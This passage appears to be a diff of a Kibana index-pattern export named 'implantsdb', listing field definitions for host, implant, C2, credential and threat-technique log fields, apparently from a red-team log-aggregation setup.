:0,\"name\":\"host.os.kernel\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"host.os.name\"}}},{\"count\":0,\"name\":\"host.os.platform\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"implant.arch\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"implant.checkin\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"implant.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"implant.input\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"implant.link_mode\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"implant.linked\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"implant.log_file\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"implant.output\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"implant.parent_id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"implant.sleep\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"implant.task\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"implant.url\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"infra.attack_scenario\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"infra.log_type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"input.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"ioc.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.file.path\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.flags\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.level\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.logger\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.offset\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.origin.file.line\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.origin.file.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.origin.function\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.original\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.source.address\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.syslog.facility.code\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.syslog.facility.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.syslog.priority\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.syslog.severity.code\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.syslog.severity.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"message\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"process.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"process.name\"}}},{\"count\":0,\"name\":\"process.pid\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"screenshot.full\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"screenshot.thumb\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"service.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"service.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tags\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.framework\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.tactic.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.tactic.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.tactic.reference\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.technique.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.technique.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.technique.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"threat.technique.name\"}}},{\"count\":0,\"name\":\"threat.technique.reference\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.email\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.hash\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"user.name\"}}}]", "title": "implantsdb"}, "coreMigrationVersion": "7.16.2", "id": "implantsdb", "migrationVersion": {"index-pattern": "7.11.0"}, "references": [], "sort": [1642152843417, 1817], "type": "index-pattern", "version": "1"} \ No newline at end of file +{"attributes": {"fieldFormatMap": "{\"implantlogfile\":{\"id\":\"url\",\"params\":{\"parsedUrl\":{\"origin\":\"http://localhost:1080\",\"pathname\":\"/app/kibana\",\"basePath\":\"\"},\"urlTemplate\":\"{{rawValue}}\"}}}", "fields": "[{\"count\":0,\"name\":\"@timestamp\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"@version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"_id\",\"type\":\"string\",\"esTypes\":[\"_id\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_index\",\"type\":\"string\",\"esTypes\":[\"_index\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_score\",\"type\":\"number\",\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_source\",\"type\":\"_source\",\"esTypes\":[\"_source\"],\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_type\",\"type\":\"string\",\"esTypes\":[\"_type\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"count\":0,\"name\":\"agent.ephemeral_id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"agent.hostname\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"agent.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"agent.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"agent.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"agent.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"c2.log.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"c2.message\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"c2.program\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"c2.timestamp\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"creds.credential\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"creds.host\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"creds.realm\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"creds.source\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"creds.username\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"ecs.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"error.code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"error.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"error.message\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"error.stack_trace\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"error.stack_trace.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"error.stack_trace\"}}},{\"count\":0,\"name\":\"error.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.action\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.category\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.created\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.dataset\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.duration\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.end\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.hash\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.ingested\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.kind\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.module\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.original\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.outcome\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.provider\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.reference\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.risk_score\",\"type\":\"number\",\"esTypes\":[\"float\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.risk_score_norm\",\"type\":\"number\",\"esTypes\":[\"float\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.sequence\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.severity\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.start\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.timezone\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.url\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.directory\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.directory_local\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.hash.md5\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.hash.sha1\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.hash.sha256\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.hash.sha512\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.path\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.path.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"file.path\"}}},{\"count\":0,\"name\":\"file.path_local\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.path_local.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"file.path_local\"}}},{\"count\":0,\"name\":\"file.size\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.url\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.architecture\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.domain_ext\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.as.organization.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.as.organization.number\",\"type\":\"number\",\"esTypes\":[\"integer\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.city_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.continent_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.country_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.country_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.location\",\"type\":\"geo_point\",\"esTypes\":[\"geo_point\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.region_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.region_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.hostname\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.ip\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.ip_ext\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.ip_int\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.mac\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.build\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.codename\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.family\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.full\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.full.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"host.os.full\"}}},{\"count\":0,\"name\":\"host.os.kernel\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"host.os.name\"}}},{\"count\":0,\"name\":\"host.os.platform\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"implant.arch\",\"type\":\"string\",\"esTypes\":[\"keywo